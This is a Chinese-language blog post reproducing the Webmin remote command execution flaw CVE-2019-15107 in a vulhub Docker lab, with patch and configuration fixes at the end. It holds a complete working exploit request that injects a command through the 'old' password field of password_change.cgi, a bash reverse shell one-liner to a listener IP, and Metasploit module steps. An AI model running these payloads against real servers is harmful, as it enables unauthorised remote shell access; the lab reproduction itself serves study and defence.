美文网首页
Webmin远程命令执行漏洞(CVE-2019-15107)复现

Webmin远程命令执行漏洞(CVE-2019-15107)复现

作者: 低调求发展 | 来源:发表于2020-01-09 12:29 被阅读0次

前言:

1.什么是webmin

Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作

http://www.webmin.com/

2.Webmin 是一个用 Perl 编写的基于浏览器的管理应用程序。

3.是一个基于Web的界面,用于Unix的系统管理。使用任何支持表和表单的浏览器,可以设置用户帐户,Apache,DNS,文件共享等。

4.为什么用webmin

    Linux系统因其高效稳定而受到广大用户的推崇与青睐,然后其管理有一定复杂性和学习周期。为了降低 Linux系统的管理难度,有时候会对公司内的Linux主机或VPS系统预装了网页管理工具webmin.

webmin

shodan看下:

shodan

中国境内到没看到多少。

漏洞概述:

    根据网上公开的poc可知,漏洞利用url是修改密码功能password_change.cgi,且需要开启密码修改功能(1.890默认开启此功能),等会我用的环境是vulhub上的。已经开启密码修改功能。听说webmin的1.890到1.920有漏洞是因为有人在SourceForge上的webmin插入了perl qx语句。

这里也提到了1.890默认配置是有漏洞的,之后的版本需要开启密码修改功能。

影响版本:

    webmin<=1.920

漏洞复现:

首先搭建环境:我用的是vulhub上的,版本1.910

webmin版本

docker-compose up -d

登录界面

其实环境已经是好的,因为vulhub上搭建了开启密码修改功能。我们可以看下

这里修改了下密码:

修改密码

利用修改的密码登录:,然后看看是否开启密码修改功能,没开启手动开启。这个是允许新密码重置旧密码。

img1

然后再去查看webmin的配置文件

进入/etc/webmin/  cat miniserv.conf ,passwd_mode=2,可以利用,0就不能利用了。

img2

前面说了,我们环境是开好了的,所以直接上。

poc:

POST /password_change.cgi HTTP/1.1

Host: 192.168.220.131:10000

Accept-Encoding: gzip, deflate

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

Cookie: redirect=1; testing=1; sid=x; sessiontest=1

Referer: https://192.168.220.131:10000/session_login.cgi

Content-Type: application/x-www-form-urlencoded

Content-Length: 60

user=rootxx&pam=&expired=2&old=test|id&new1=test2&new2=test2

img3 img4

上面poc需要注意:ip改成自己的ip,然后user参数不能是系统账户,谁便写一个不是的就行了。后面执行的命令。

getshell:

方法一:

bash -c "bash -i >& /dev/tcp/192.168.220.128/9999 0>&1"

对上面bash进行url编码:

img5

发送:

img6 反弹shell

方法二:

利用metasploit

首先search下看看利用模块:用下图这个模块。

meta1

设置RHOSTS、SSL、LHOST

meta2 meta3 meta4 meta5 meta6

没meterpreter,看着别扭了点。哈哈。

修复建议:

目前Webmin官方已发布最新版本Webmin 1.940 修复了该漏洞,请受影响的用户尽快升级至最新版本:

下载链接:http://webmin.com/download.html

临时解决方案:

1.900 到 1.920版本的用户,编辑Webmin配置文件:/etc/webmin/miniserv.conf,注释或删除“passwd_mode=”行,然后运行/etc/webmin/restart 重启服务命令。

注:修复漏洞前请将资料备份,并进行充分测试。

参考链接:

https://blog.csdn.net/qq_43380549/article/details/100011292

相关文章

网友评论

      本文标题:Webmin远程命令执行漏洞(CVE-2019-15107)复现

      本文链接:https://www.haomeiwen.com/subject/xyaractx.html